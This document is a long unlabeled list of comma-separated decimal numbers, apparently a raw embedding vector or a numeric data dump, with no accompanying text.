0.029834745451807976, 0.0009677999769337475, -0.009676133282482624, 0.016440467908978462, -0.005330832675099373, 0.02169663831591606, -0.040078304708004, 0.022756831720471382, -0.004203443881124258, -0.0013121762312948704, -0.021174008026719093, 0.00451328931376338, -0.03712170943617821, -0.0033131050877273083, -0.011975708417594433, 0.029760083183646202, 0.0002442831755615771, 0.02284642681479454, 0.02505640685558319, 0.014088629744946957, -0.0010909915436059237, -0.0057377382181584835, 0.007958918809890747, -0.008421819657087326, 0.009467081166803837, -0.01151280663907528, -0.011983174830675125, 0.020188476890325546, -0.0019300003768876195, 0.013439074158668518, 0.014544065110385418, 0.03550902009010315, 0.05895273759961128, -0.03524024039506912, 0.013065766543149948, -0.005278569646179676, -0.010810988955199718, 0.0013849713141098619, 0.03320944681763649, -0.011079770512878895, -0.012311684899032116, 0.008377023041248322, 0.031238380819559097, -0.0012179161421954632, 0.021771300584077835, 0.010056907311081886, 0.01636580564081669, 0.01151280663907528, -0.013745186850428581, 0.03240310028195381, -0.019128281623125076, -0.02707226760685444, 0.006973386276513338, 0.02206994593143463, 0.00980305764824152, -0.05671289190649986, 0.01313296239823103, -0.00799624901264906, 0.01727667637169361, 0.00477833766490221, -0.009885185398161411, 0.0022137141786515713, -0.012505805119872093, 0.027311185374855995, -0.006320097949355841, 0.035031188279390335, -0.000456368550658226, 0.00358748622238636, -0.007066713180392981, 0.00664487574249506, -0.007118976209312677, 0.010288357734680176, -0.010325688868761063, -0.017291609197854996, -0.02907319739460945, -0.0016873504500836134, -0.04118329659104347, -0.0018180081387981772, -0.008190369233489037, 0.004535687621682882, 0.01590290479362011, -0.008854856714606285, -0.00358748622238636, 0.00538309570401907, -0.002609420334920287, -0.013476405292749405, -0.009534277021884918, 0.01727667637169361, -0.02138306014239788, 0.014417139813303947, 0.0065515488386154175, -0.007197370752692223, -0.026370450854301453, -0.02396634966135025, -0.01083338726311922, -0.023204801604151726, 0.020143678411841393, -0.031238380819559097, -0.022488050162792206, 0.012811917811632156, -0.042497340589761734, 0.025265458971261978, 0.0011768522672355175, -0.014514200389385223, -0.015320545062422752, 0.00616330886259675, -0.00013100764772389084, -0.04037695378065109, 0.020681241527199745, 0.015275747515261173, 0.10142021626234055, -0.018068088218569756, 0.02608673647046089, -0.01658979058265686, -0.0008469416643492877, -0.0006234237225726247, -0.013274818658828735, 0.02396634966135025, 0.0014279016759246588, 0.021831030026078224, 0.02629578858613968, 0.01083338726311922, -0.0006616877508349717, 0.01785903610289097, 0.011475476436316967, 0.021084414795041084, 0.0015968233346939087, 0.006577680353075266, -0.0019337334670126438, 0.0003856734256260097, 0.018560854718089104, -0.005006055347621441, 0.011042439378798008, -0.009011645801365376, 0.01433501299470663, -0.010400350205600262, -0.008795127272605896, -0.018904298543930054, -0.016515128314495087, -0.021368127316236496, -0.012237023562192917, -0.0046775443479418755, -0.016425535082817078, -0.01817261427640915, 0.00732056237757206, 0.004453559871762991, 0.033627551048994064, -0.004666345193982124, -0.010251027531921864, -0.02374236471951008, 0.0007704136078245938, -0.03270174562931061, -0.01517122145742178, 0.02135319635272026, 0.00047176750376820564, -0.02247311919927597, 0.022055014967918396, 0.00010668431787053123, -0.029610760509967804, -0.010094238445162773, -0.005584681872278452, -0.01745586469769478, 0.013924374245107174, 0.03992898389697075, -0.0007130175363272429, 0.027355981990695, -0.005763869732618332, -0.02072603814303875, -0.020307933911681175, -0.013431607745587826, -0.01255806814879179, 0.006775533314794302, 0.0123266177251935, 0.017948631197214127, -0.020218340680003166, -0.006223037838935852, -0.015148823149502277, 0.022174471989274025, -0.03676333278417587, 0.01366305910050869, 0.011550137773156166, -0.010504876263439655, 0.009922516532242298, 0.0028072732966393232, 0.014140892773866653, 0.012908977456390858, -0.007268299348652363, 0.03332890570163727, -0.028117530047893524, -0.0049948557280004025, 0.020935092121362686, 0.019277606159448624, -0.013558533042669296, 0.008474082686007023, -0.0044274283573031425, 0.029715286567807198, -0.017231879755854607, 0.01383478008210659, 0.002000928856432438, -0.0007004184299148619, -0.01323002204298973, -0.0009566007647663355, 0.0072533669881522655, 0.011191762052476406, -0.0003140450280625373, 0.019904762506484985, 0.007876791059970856, -0.007914121262729168, -0.017560390755534172, -0.015238417312502861, 0.008026113733649254, 0.0023705032654106617, 0.0418403185904026, 0.002850203774869442, -0.013267353177070618, 0.016231415793299675, -0.0022417122963815928, 0.02646004408597946, 0.015178687870502472, -0.015104026533663273, -0.020740970969200134, -0.03422484174370766, 0.007660272531211376, -0.021935556083917618, -0.020531918853521347, 0.0014876308850944042, 0.004341567400842905, 0.0007718135020695627, -0.02660936675965786, -0.017127353698015213, -0.01314789429306984, -0.013200157321989536, 0.03748008608818054, -0.0029509966261684895, 0.000014516708688461222, 0.017530525103211403, 0.009213232435286045, -0.0316266231238842, 0.02689308114349842, 0.01661965437233448, 0.011117100715637207, -0.006081181112676859, 0.004024256020784378, -0.0039943912997841835, 0.013812381774187088, -0.023145072162151337, 0.01991969533264637, 0.0038021381478756666, 0.003975726198405027, -0.008862323127686977, -0.006547815632075071, 0.03183567523956299, 0.019770370796322823, -0.006648608483374119, 0.007268299348652363, 0.015230950899422169, 0.008817525580525398, 0.016037294641137123, 0.031537026166915894, 0.008466617204248905, -0.0057452041655778885, -0.025847818702459335, 0.010333155281841755, 0.037211302667856216, 0.004826867487281561, -0.0001807042135624215, 0.012707391753792763, -0.02486228756606579, -0.019934626296162605, 0.03264201804995537, 0.02316000498831272, 0.0067456685937941074, 0.03258229047060013, 0.00248622871004045, -0.0005062984419055283, 0.028520701453089714, -0.007275765296071768, -0.036554280668497086, 0.005412960425019264, -0.03016325645148754, 0.000023623373635928147, 0.0005562283331528306, -0.013551066629588604, 0.022353660315275192, 0.019008824601769447, 0.01008677203208208, -0.016634587198495865, -0.012998571619391441, 0.029745150357484818, -0.0025982209481298923, -0.004281838424503803, 0.007555746007710695, 0.004826867487281561, -0.005707873497158289, 0.02336905710399151, -0.04354260116815567, -0.023130139335989952, 0.031208517029881477, -0.031178653240203857, 0.021024685353040695, 0.0034941593185067177, 0.03404565528035164, -0.016321009024977684, 0.0026803486980497837, -0.0225925762206316, -0.005909459665417671, -0.004770871251821518, -0.013722787611186504, -0.011072304099798203, -0.010183831676840782, -0.02066631056368351, -0.01708255708217621, -0.017844103276729584, -0.00538309570401907, 0.004580484703183174, -0.013789983466267586, 0.020651377737522125, 0.013020969927310944, -0.006913657300174236, 0.0037442753091454506, -0.019038688391447067, 0.028744686394929886, 0.021636908873915672, 0.0009244029643014073, 0.01271485723555088, 0.019128281623125076, 0.015514664351940155, -0.02683335170149803, 0.013319616205990314, -0.007413889281451702, -0.021338263526558876, 0.02680348791182041, 0.013565998524427414, 0.001342040835879743, -0.01618661917746067, 0.020113814622163773, 0.02486228756606579, -0.03628550097346306, -0.017127353698015213, 0.02035273052752018, -0.021263601258397102, -0.016544993966817856, 0.010616868734359741, 0.015410138294100761, -0.008757797069847584, -0.025937413796782494, -0.0010433947900310159, 0.021636908873915672, 0.010139035061001778, -0.02626592479646206, 0.015335476957261562, -0.012796984985470772, -0.026534706354141235, -0.006514218170195818, -0.006853927858173847, -0.00016623854753561318, 0.010124102234840393, 0.0005739604821428657, -0.00683899549767375, 0.03622576966881752, -0.032851070165634155, -0.012378880754113197, -0.007712535560131073, -0.007690136786550283, -0.009063908830285072, 0.03529996797442436, 0.010467546060681343, -0.007204837165772915, -0.0037536080926656723, 0.0014652324607595801, -0.010437681339681149, -0.013498803600668907, 0.00007413655839627609, 0.0038898654747754335, -0.023697568103671074, 0.031298112124204636, -0.02981981262564659, -0.005905726458877325, 0.007675204426050186, 0.0021054549142718315, -0.005278569646179676, -0.004696209914982319, 0.01548479963093996, -0.023443719372153282, 0.005106848198920488, -0.010056907311081886, 0.006402225699275732, -0.019441861659288406, 0.010310756042599678, 0.0032757744193077087, -0.00579000124707818, 0.05026213824748993, 0.015305612236261368, -0.018635516986250877, 0.018680313602089882, -0.02029300294816494, -0.03404565528035164, 0.012319151312112808, -0.03171621635556221, -0.031357839703559875, -0.008757797069847584, 0.014693387784063816, -0.0013168426230549812, -0.025041475892066956, 0.020083948969841003, 0.0032589754555374384, -0.015619190409779549, 0.019471725448966026, -0.02129346691071987, 0.009302825666964054, 0.009086307138204575, 0.0236229058355093, 0.010504876263439655, 0.012147430330514908, -0.006084914319217205, 0.019471725448966026, -0.02324959821999073, -0.007988782599568367, 0.015798378735780716, -0.004938859958201647, 0.01291644386947155, -0.023921553045511246, -0.017873968929052353, -0.035031188279390335, -0.0019318669801577926, -0.016321009024977684, 0.007339227944612503, -0.00714137451723218, -0.013595863245427608, -0.013170292600989342, 0.010056907311081886, -0.023428786545991898, -0.0068688602186739445, -0.03255242481827736, -0.0270125400274992, 0.007958918809890747, 0.007137641776353121, 0.010139035061001778, -0.002387302229180932, -0.023145072162151337, 0.007092844694852829, 0.02551930956542492, 0.012237023562192917, 0.0050097880885005, 0.002476896159350872, -0.01612688973546028, -0.0024974278640002012, 0.011863715946674347, -0.011706926859915257, -0.013215090148150921, -0.0353596992790699, 0.03249269351363182, -0.01618661917746067, -0.005431625992059708, 0.02669895999133587, 0.003352302359417081, -0.01016143336892128, 0.007152574136853218, 0.0007256167009472847, -0.0390927754342556, -0.02692294493317604, -0.017411068081855774, -0.0011385881807655096, -0.015365341678261757, 0.0009449349017813802, -0.002030793344601989, -0.0030891206115484238, 0.0030592558905482292, -0.0011339219054207206, -0.03273161128163338, -0.0135062700137496, 0.0035128246527165174, 0.003945861477404833, -0.005943057127296925, 0.0075632124207913876, 0.0015342943370342255, -0.019471725448966026, 0.009676133282482624, -0.0018021424766629934, -0.026027007028460503, -0.007951452396810055, 0.01627621240913868, 0.002144652185961604, 0.020218340680003166, 0.016724180430173874, 0.011662130244076252, 0.024727895855903625, -0.005957989487797022, -0.023817026987671852, 0.01882963627576828, 0.013409209437668324, 0.0008385422406718135, 0.005595881026238203, 0.021024685353040695, -0.032791342586278915, 0.009900118224322796, -0.011184296570718288, 0.008257564157247543, -0.019322402775287628, -0.004307969938963652, -0.016813775524497032, 0.01811288483440876, 0.025877684354782104, 0.043900974094867706, 0.014812846668064594, 0.009459614753723145, 0.010818454436957836, -0.013887043111026287, -0.02141292579472065, 0.001121789449825883, 0.015253349207341671, 0.02359304204583168, 0.0013439074391499162, 0.01687350496649742, -0.005946790333837271, 0.020845497027039528, -0.007817061617970467, -0.01636580564081669, 0.026041939854621887, -0.00045800177031196654, 0.027624763548374176, 0.010236094705760479, 0.027565034106373787, 0.0007424155483022332, 0.011647197417914867, -0.0035669542849063873, -0.018097953870892525, 0.0009929982479661703, -0.020830564200878143, 0.015320545062422752, 0.018978958949446678, 0.01313296239823103, -0.015118958428502083, -0.02798313833773136, 0.022458186373114586, -0.013043368235230446, -0.006353695876896381, -0.006984585430473089, -0.0007167506264522672, 0.012811917811632156, 0.006301432382315397, -0.0018376067746430635, 0.013401743955910206, -0.008705534040927887, 0.025250528007745743, 0.006902457680553198, -0.011774122714996338, -0.0097731938585639, -0.005177776794880629, -0.013633194379508495, 0.007070446386933327, 0.0005926258163526654, -0.01983010023832321, 0.01515628956258297, 0.00045310211135074496, -0.012610331177711487, -0.013103097677230835, -0.005715339444577694, -0.008877255022525787, -0.002978994743898511, 0.008115707896649837, -0.002111054491251707, 0.006782999262213707, 0.006043850444257259, 0.015104026533663273, 0.01008677203208208, 0.011184296570718288, 0.004946325905621052, 0.0027307451236993074, 0.0056070806458592415, 0.014484335668385029, -0.018336869776248932, 0.03252255916595459, -0.00207745679654181, 0.003473627381026745, 0.0258328877389431, -0.012371414341032505, -0.0025664898566901684, 0.0023145072627812624, -0.024100739508867264, 0.023578109219670296, -0.0076826708391308784, 0.00957160722464323, 0.0017582789296284318, -0.0008716732845641673, -0.010385418310761452, -0.007395223714411259, -0.006413424853235483, -0.007242167834192514, -0.009780659340322018, 0.016813775524497032, 0.022204337641596794, -0.004763405304402113, 0.014894974417984486, -0.008003715425729752, 0.02169663831591606, -0.0016136221820488572, 0.007660272531211376, 0.0013635060749948025, 0.01621648296713829, 0.009213232435286045, 0.010601935908198357, -0.004315435886383057, 0.007003250997513533, 0.021188940852880478, 0.0220998115837574, -0.01387957762926817, 0.01440967433154583, 0.012468474917113781, -0.004285571631044149, 0.012266888283193111, -0.008003715425729752, 0.004617815371602774, 0.004106383770704269, 0.02390662021934986, -0.011826385743916035, -0.005554817151278257, -0.012132497504353523, 0.023891687393188477, -0.002827805234119296, 0.007331761531531811, -0.011878648772835732, -0.001957998378202319, 0.016022363677620888, -0.00927296094596386, 0.005349498242139816, -0.0034997588954865932, 0.009444682858884335, -0.0110499057918787, -0.007346693892031908, 0.006159575656056404, 0.008227700367569923, -0.014521666802465916, -0.0061185117810964584, 0.0023574375081807375, 0.0027643428184092045, 0.004908995237201452, -0.004770871251821518, -0.0053718965500593185, -0.006973386276513338, 0.000024979528461699374, -0.0017396134790033102, -0.006615011021494865, -0.026728825643658638, 0.0012141830520704389, -0.006230504252016544, 0.021935556083917618, -0.00925802905112505, 0.003882399294525385, -0.00602145167067647, 0.016858572140336037, -0.0056892079301178455, -0.003132050856947899, 0.02580302208662033, 0.0008198768482543528, -0.009601471945643425, -0.007555746007710695, -0.009317758493125439, -0.0015520263696089387, 0.010437681339681149, 0.01039288379251957, -0.00444236071780324, 0.00538309570401907, -0.010564605705440044, -0.010206229984760284, 0.0008954716613516212, -0.01142321340739727, -0.008623406291007996, 0.0026019541546702385, 0.013745186850428581, -0.002023327397182584, -0.011034972965717316, 0.011430678889155388, 0.003016325645148754, -0.00523750577121973, 0.009937448427081108, 0.006555281579494476, 0.015141356736421585, -0.009496945887804031, -0.005450291093438864, -0.011460543610155582, 0.016455400735139847, -0.014133426360785961, 0.006566481199115515, -0.010885650292038918, 0.009579073637723923, -0.005536152049899101, -0.013700389303267002, 0.010251027531921864, -0.011109634302556515, 0.03598685562610626, 0.01000464428216219, -0.008765262551605701, -0.0018684046808630228, -0.018978958949446678, -0.014745650812983513, 0.015260815620422363, -0.020815633237361908, -0.02035273052752018, -0.0039794594049453735, -0.008160504512488842, 0.022174471989274025, -0.032910801470279694, -0.02038259617984295, 0.005446558352559805, -0.007201103959232569, -0.019426928833127022, 0.004879130516201258, -0.0014577662805095315, 0.017844103276729584, -0.0029379308689385653, 0.012573000974953175, -0.01584317535161972, -0.004617815371602774, -0.008802593685686588, 0.008593541570007801, 0.024578573182225227, -0.0016238881507888436, -0.01511149201542139, -0.03936155512928963, -0.003837602213025093, -0.01705269142985344, -0.011356017552316189, 0.0001780210732249543, -0.0011563203297555447, -0.009549208916723728, 0.00374987511895597, -0.000006383414529409492, 0.00285953632555902, -0.03697238489985466, 0.014043832197785378, 0.0075034829787909985, 0.010736326687037945, 0.01612688973546028, 0.01823234371840954, -0.0008203434990718961, 0.01151280663907528, -0.01653006114065647, 0.00627156812697649, 0.00918336771428585, -0.011542671360075474, 0.02875961922109127, 0.008974315598607063, 0.026654163375496864, -0.017918765544891357, 0.026161398738622665, -0.011445611715316772, -0.0011143232695758343, -0.00799624901264906, 0.009175901301205158, 0.005969188641756773, -0.01554452907294035, 0.004285571631044149, -0.005618279799818993, 0.006398492492735386, 0.022831493988633156, 0.010878183878958225, -0.0017144152661785483, -0.000026000292564276606, -0.006088647060096264, 0.0034138981718569994, 0.017231879755854607, -0.008765262551605701, 0.015283213928341866, 0.009220697917044163, -0.009713464416563511, 0.003652815008535981, -0.008474082686007023, 0.020815633237361908, 0.015589326620101929, 0.013633194379508495, -0.007148840930312872, -0.006514218170195818, -0.0013327081687748432, 0.007100311107933521, 0.005076983477920294, 0.003354168962687254, 0.011482941918075085, 0.01188611425459385, 0.012072768062353134, -0.017216946929693222, 0.003148849820718169, -0.01389450952410698, 0.007660272531211376, -0.011072304099798203, -0.00033644348150119185, -0.0006467554485425353, -0.014484335668385029, -0.005218840669840574, 0.002661683363839984, -0.013692923821508884, -0.013468938879668713, 0.0059990533627569675, 0.005424159578979015, 0.013259886763989925, -0.010265959426760674, -0.01508162822574377, 0.0013588396832346916, 0.0014036366483196616, -0.008287428878247738, -0.0013299083802849054, 0.004681277554482222, 0.02038259617984295, -0.0016780177829787135, 0.008093309588730335, -0.041004110127687454, -0.00772746792063117, -0.001522161765024066, 0.014230486005544662, 0.01420808769762516, 0.019053621217608452, -0.009370021522045135, 0.008145572617650032, 0.0061110458336770535, -0.009937448427081108, 0.006894991733133793, 0.0058683957904577255, 0.004531954415142536, -0.011191762052476406, 0.005218840669840574, 0.019770370796322823, -0.01201303955167532, -0.0018768040463328362, -0.018814703449606895, 0.01202797144651413, 0.013752652332186699, 0.0011124566663056612, -0.007029382511973381, 0.007884256541728973, -0.014402207918465137, -0.011990640312433243, 0.007137641776353121, -0.002728878753259778, -0.046917300671339035, 0.014760583639144897, 0.0014820311916992068, -0.028222056105732918, -0.02181609719991684, -0.025758225470781326, 0.0015977566363289952, 0.008698067627847195, 0.023130139335989952, 0.02511613629758358, 0.003585619619116187, -0.000024002512873266824, 0.002069990849122405, 0.0036490820348262787, -0.027430644258856773, -0.0063648950308561325, -0.011072304099798203, 0.044617727398872375, 0.012446075677871704, -0.008914586156606674, 0.004192244727164507, 0.011550137773156166, 0.009265495464205742, -0.014603793621063232, 0.002596354577690363, -0.0310890581458807, 0.009780659340322018, -0.0030853874050080776, 0.006032651290297508, -0.015738649293780327, 0.00415491359308362, 0.01090804859995842, 0.008720465935766697, 0.007529614493250847, -0.004218376241624355, 0.0046066162176430225, -0.02804286777973175, -0.0041101169772446156, 0.005289768800139427, 0.0027307451236993074, 0.008869788609445095, 0.010840853676199913, 0.0005720939370803535, -0.005711606703698635, -0.021562248468399048, -0.01202797144651413, -0.02215954102575779, -0.00020018621580675244, -0.0029379308689385653, 0.03706198185682297, -0.020054085180163383, 0.008265030570328236, 0.012207158841192722, 0.02097988873720169, -0.01997942291200161, 0.0058683957904577255, -0.01390944141894579, 0.027117066085338593, -0.0032496429048478603, -0.025071339681744576, 0.011244025081396103, 0.021144144237041473, -0.014088629744946957, -0.0011367216939106584, -0.0043341014534235, 0.0063088987953960896, -0.024548709392547607, 0.009295359253883362, 0.006958453916013241, -0.007772264536470175, -0.004266906064003706, 0.004416229203343391, 0.004741006530821323, 0.0009780660038813949, 0.002508627250790596, -0.0053644306026399136, -0.010684063658118248, -0.0076192086562514305, -0.0039869253523647785, -0.0017573456279933453, -0.011505341157317162, 0.0068053980357944965, 0.007600543089210987, -0.0020251937676221132, 0.00317871430888772, 0.001072326092980802, 0.0006644875393249094, -0.0012263155076652765, -0.012035437859594822, -0.02336905710399151, -0.004535687621682882, 0.012072768062353134, 0.0012197826290503144, -0.014909906312823296, 0.03105919435620308, 0.011744257993996143, -0.0038861322682350874, -0.003165648551657796, 0.010557139292359352, -0.005487621761858463, -0.014917372725903988, -0.009093773551285267, -0.018127817660570145, 0.0059990533627569675, -0.014484335668385029, 0.0018422730499878526, -0.008406887762248516, -0.008578608743846416, 0.0069360556080937386, 0.001771344686858356, -0.003486693138256669, -0.016022363677620888, 0.0005879594828002155, -0.010975243523716927, -0.020397529006004333, -0.009683599695563316, 0.02919265627861023, -0.0050545851700007915, -0.01084831915795803, 0.022025149315595627, -0.004121316131204367, 0.003671480342745781, -0.00452822120860219, -0.0074400207959115505, -0.0013504403177648783, -0.004378898534923792, -0.001555759459733963, 0.00653661647811532, 0.008854856714606285, -0.0063088987953960896, 0.02574329264461994, 0.009213232435286045, 0.0069435215555131435, 0.008220233954489231, -0.023518379777669907, -0.013334548100829124, 0.007227235473692417, 0.0220998115837574, -0.003201112849637866, 0.016634587198495865, -0.013924374245107174, -0.011012574657797813, -0.009810524061322212, -0.0038898654747754335, 0.0029845943208783865, -0.021338263526558876, -0.009720930829644203, -0.00003345186269143596, 0.015678919851779938, 0.010228628292679787, 0.011468010023236275, 0.007690136786550283, -0.010273425839841366, 0.005666809622198343, -0.013655592687427998, -0.029551031067967415, 0.010796056129038334, 0.006693405564874411, 0.01667938381433487, 0.007884256541728973, -0.011176830157637596, -0.01473818439990282, -0.01997942291200161, 0.005450291093438864, 0.012670060619711876, -0.0008175437105819583, -0.005125513765960932, -0.014387276023626328, 0.02330932766199112, -0.0027774085756391287, 0.03813710808753967, 0.03037230856716633, 0.006084914319217205, -0.008317293599247932, -0.01655992679297924, -0.0019617315847426653, -0.0039943912997841835, 0.01149787474423647, -0.018560854718089104, -0.010639267042279243, 0.021517451852560043, 0.03174607828259468, 0.014006501995027065, 0.0028184724505990744, -0.00902657862752676, -0.00616330886259675, 0.02867002598941326, 0.011057371273636818, 0.037300895899534225, 0.008489015512168407, -0.028460972011089325, 0.013185225427150726, 0.000015442687072209083, -0.011408280581235886, -0.013551066629588604, -0.02112921141088009, 0.013737720437347889, 0.011445611715316772, 0.005076983477920294, 0.010743793100118637, -0.0005720939370803535, -0.0018674713792279363, -0.027863681316375732, 0.02247311919927597, -0.01017636526376009, -0.0188595000654459, -0.00639475928619504, -0.004726074635982513, 0.003772273426875472, 0.026728825643658638, 0.025593969970941544, -0.014327546581625938, 0.02442925050854683, 0.007988782599568367, 0.009138570167124271, -0.018307005986571312, 0.019277606159448624, -0.005300967954099178, -0.0044908905401825905, 0.009317758493125439, -0.02436952106654644, -0.02054685167968273, -0.004558085929602385, 0.0012991104740649462, 0.00980305764824152, 0.007734933868050575, -0.022264067083597183, 0.03440403193235397, 0.0030387239530682564, -0.0019066686509177089, -0.006659808102995157, -0.02660936675965786, -0.02433965727686882, -0.01661965437233448, 0.0053644306026399136, 0.02483242191374302, -0.017575323581695557, -0.000003933583229809301, -0.026684029027819633, 0.006797931622713804, 0.010071839205920696, -0.0019318669801577926, -0.014417139813303947, -0.016858572140336037, -0.0261763297021389, 0.01238634716719389, -0.017321472987532616, 0.00009560174657963216, -0.0097731938585639, 0.0163060761988163, -0.010467546060681343, -0.015193619765341282, 0.009668666869401932, -0.003083521034568548, -0.007010716944932938, -0.0027307451236993074, 0.0032608420588076115, -0.007029382511973381, -0.02884921245276928, -0.040197763592004776, -0.013177759014070034, 0.002331305993720889, -0.020561784505844116, -0.011632265523076057, 0.009482013061642647, 0.017515594139695168, -0.0023499715607613325, 0.010579537600278854, -0.019710641354322433, 0.010721394792199135, 0.0041735791601240635, 0.03401578962802887, -0.00004182212069281377, 0.014865109696984291, 0.007182438392192125, 0.012319151312112808, -0.024518843740224838, -0.008548744022846222, -0.010056907311081886, -0.02178623341023922, -0.0031861804891377687, 0.0031525827944278717, -0.022010216489434242, -0.015186154283583164, 0.03837602213025093, 0.010810988955199718, -0.01552959717810154, 0.02586275152862072, -0.0006864193710498512, -0.04124302417039871, -0.012811917811632156, 0.01727667637169361, -0.0010536607587710023, -0.016754046082496643, 0.020083948969841003, -0.005431625992059708, -0.00009128537931246683, -0.012490873225033283, 0.004759672097861767, 0.0006411558133549988, -0.045424070209264755, -0.02514600194990635, -0.008914586156606674, -0.02330932766199112, -0.020128747448325157, 0.004938859958201647, -0.014200622215867043, 0.02095002308487892, 0.006036384031176567, -0.004293037578463554, 0.010452613234519958, -0.011789054609835148, 0.0237722285091877, 0.0038450683932751417, 0.0005674276035279036, 0.006891258526593447, 0.003596819005906582, 0.008578608743846416, -0.009825456887483597, -0.02221926860511303, 0.007010716944932938, -0.022353660315275192, -0.001016329973936081, -0.00020508587476797402, -0.014006501995027065, 0.009691066108644009, 0.0012888445053249598, 0.00575640331953764, 0.016634587198495865, -0.01779930666089058, -0.008541278541088104, 0.006032651290297508, -0.012438610196113586, 0.01590290479362011, 0.019038688391447067, -0.0013859044993296266, 0.005909459665417671, -0.0008110107737593353, -0.01914321444928646, -0.003604284953325987, 0.023503446951508522, 0.0220998115837574, -0.0034586950205266476, -0.02097988873720169, -0.0036882793065160513, -0.019740507006645203, 0.02577315829694271, 0.003012592438608408, -0.005368163343518972, -0.02262244187295437, -0.007305630017071962, 0.008914586156606674, 0.007720001507550478, -0.006391026545315981, 0.00027134796255268157, 0.021607045084238052, 0.0030947201885282993, -0.017933698371052742, 0.005099382251501083, 0.023040546104311943, -0.004651412833482027, 0.010139035061001778, 0.0019617315847426653, 0.009780659340322018, -0.0013672391651198268, 0.01785903610289097, 0.02302561327815056, -0.010736326687037945, 0.02477269433438778, 0.008377023041248322, -0.01963598094880581, -0.013103097677230835, -0.012296753004193306, -0.009668666869401932, 0.014133426360785961, 0.002727012149989605, -0.003882399294525385, -0.0006308899028226733, -0.015380273573100567, 0.007301896810531616, 0.012908977456390858, -0.005282302852720022, 0.012363947927951813, -0.0005104981828480959, 0.002639284823089838, 0.02060658112168312, -0.009608938358724117, 0.00294913025572896, -0.012938842177391052, -0.015350408852100372, -0.016754046082496643, 0.007660272531211376, -0.023861823603510857, 0.0015716251218691468, -0.008302361704409122, -0.017097488045692444, -0.006566481199115515, 0.014909906312823296, -0.03189540281891823, 0.005200175102800131, -0.009340156801044941, -0.02147265337407589, -0.009974779561161995, -0.0195463877171278, -0.015768513083457947, 0.010056907311081886, -0.018710177391767502, 0.003776006633415818, -0.019874896854162216, 0.006215571891516447, 0.03246283158659935, 0.009310292080044746, -0.02816232666373253, -0.014984567649662495, -0.0073914909735322, -0.018247276544570923, -0.00013019103789702058, -0.0005286969244480133, 0.00259448797442019, 0.02589261718094349, -0.014118494465947151, -0.023503446951508522, -0.013327081687748432, -0.005532418843358755, -0.02654963731765747, 0.013006037101149559, 0.02038259617984295, -0.04581231251358986, 0.011042439378798008, 0.0021614511497318745, -0.016634587198495865, 0.009063908830285072, -0.019964491948485374, -0.02184596098959446, 0.001022862852551043, 0.02448897995054722, 0.0016397536965087056, 0.005159111227840185, 0.010407816618680954, -0.006473154295235872, 0.001000464428216219, -0.020561784505844116, -0.017590254545211792, 0.0033784338738769293, 0.0159626342356205, -0.013565998524427414, -0.000012431435607140884, 0.003148849820718169, 0.008235165849328041, -0.007257100194692612, 0.029954202473163605, 0.006230504252016544, 0.027505304664373398, 0.013640660792589188, -0.003882399294525385, -0.007690136786550283, -0.0010751259978860617, 0.0012235157191753387, 0.0029099329840391874, 0.01323002204298973, 0.0023798360489308834, -0.0057452041655778885, -0.000919270038139075, -0.006282767280936241, -0.029491301625967026, -0.013110563158988953, 0.014297681860625744, -0.01554452907294035, -0.003077921224758029, 0.007615475449711084, 0.024608438834547997, 0.0005860929377377033, -0.0061185117810964584, -0.0017078823875635862, 0.014663523063063622, 0.0287297535687685, 0.01075125951319933, 0.009526810608804226, -0.007734933868050575, -0.010273425839841366, -0.008272496983408928, -0.026594433933496475, 0.016201550140976906, 0.008772728964686394, 0.009952381253242493, 0.017844103276729584, -0.0012935108970850706, 0.0008656070567667484, 0.013118029572069645, -0.01067659817636013, -0.002684081671759486, -0.006148376502096653, 0.01599249802529812, 0.012020505033433437, 0.01324495393782854, -0.005577215924859047, 0.004826867487281561, -0.013625727966427803, -0.01636580564081669, -0.0008366756956093013, -0.021517451852560043, 0.0021390526089817286, -0.0032179115805774927, -0.006603811867535114, 0.005468956660479307, -0.0038450683932751417, 0.023727431893348694, -0.00022188472212292254, -0.010698996484279633, 0.0034680278040468693, 0.023458650335669518, -0.0005034986534155905, 0.0011899180244654417, 0.013424142263829708, 0.003443762892857194, 0.004584217444062233, -0.0007176838698796928, 0.0019281338900327682, -0.011415746994316578, 0.010213696397840977, -0.02316000498831272, 0.0009146036463789642, 0.02339892089366913, 0.0087428642436862, 0.01054967287927866, 0.005226306617259979, 0.01014650147408247, 0.00807837676256895, 0.003253375878557563, 0.007779730949550867, -0.01653006114065647, -0.005200175102800131, 0.016978031024336815, 0.014081163331866264, 0.013842246495187283, -0.026012074202299118, -0.0027139463927596807, -0.008235165849328041, 0.006069981958717108, 0.0018768040463328362, -0.0074960170313715935, -0.005215107463300228, 0.014327546581625938, -0.010915515013039112, -0.002111054491251707, 0.020860429853200912, -0.015858108177781105, -0.0003166115202475339, 0.0012645795941352844, 0.014394741505384445, 0.00248622871004045, -0.00515164528042078, -0.006600078660994768, 0.016918301582336426, -0.014715786091983318, -0.000558561529032886, -0.0009169368422590196, -0.0005086316377855837, 0.02100975252687931, 0.003432563506066799, 0.004580484703183174, -0.009295359253883362, -0.006596345454454422, 0.010803522542119026, 0.005592148285359144, -0.0009640669450163841, 0.014857643283903599, 0.004826867487281561, 0.024922017008066177, 0.010012110695242882, 0.015380273573100567, -0.02181609719991684, 0.017202015966176987, 0.0195463877171278, -0.018904298543930054, 0.006107312627136707, -0.0003943061747122556, -0.0057452041655778885, -0.0014698987361043692, -0.001594023546203971, -0.013207623735070229, 0.009146036580204964, -0.006152109708636999, -0.0220998115837574, 0.01151280663907528, -0.008018647320568562, 0.020337799564003944, 0.0006868860218673944, 0.006883792579174042, 0.0004071386356372386, -0.002827805234119296, 0.012102632783353329, 0.0007442820933647454, -0.01405129861086607, 0.005006055347621441, 0.03323930874466896, -0.02430979162454605, 0.001292577595449984, -0.007854392752051353, 0.018964026123285294, -0.01817261427640915, 0.01202797144651413, 0.02689308114349842, -0.022667238488793373, -0.009355088695883751, -0.00972839631140232, -0.0010844586649909616, 0.007313096430152655, 0.024130605161190033, 0.022891223430633545, 0.013319616205990314, 0.01014650147408247, 0.01389450952410698, -0.004890329670161009, 0.017635051161050797, -0.001447500311769545, 0.007066713180392981, 0.007115243002772331, -0.007831993512809277, 0.010482477955520153, -0.006887525785714388, -0.014753117226064205, 0.0008852056926116347, -0.028834279626607895, 0.03019312024116516, 0.006010252516716719, 0.023428786545991898, -0.007361626252532005, -0.027117066085338593, -0.010295824147760868, -0.023324260488152504, 0.0015137623995542526, 0.006424624007195234, 0.019188011065125465, -0.009280427359044552, 0.0007620141841471195, -0.004505822900682688, -0.006749401800334454, 0.015887971967458725, -0.005954256746917963, -0.01670924946665764, 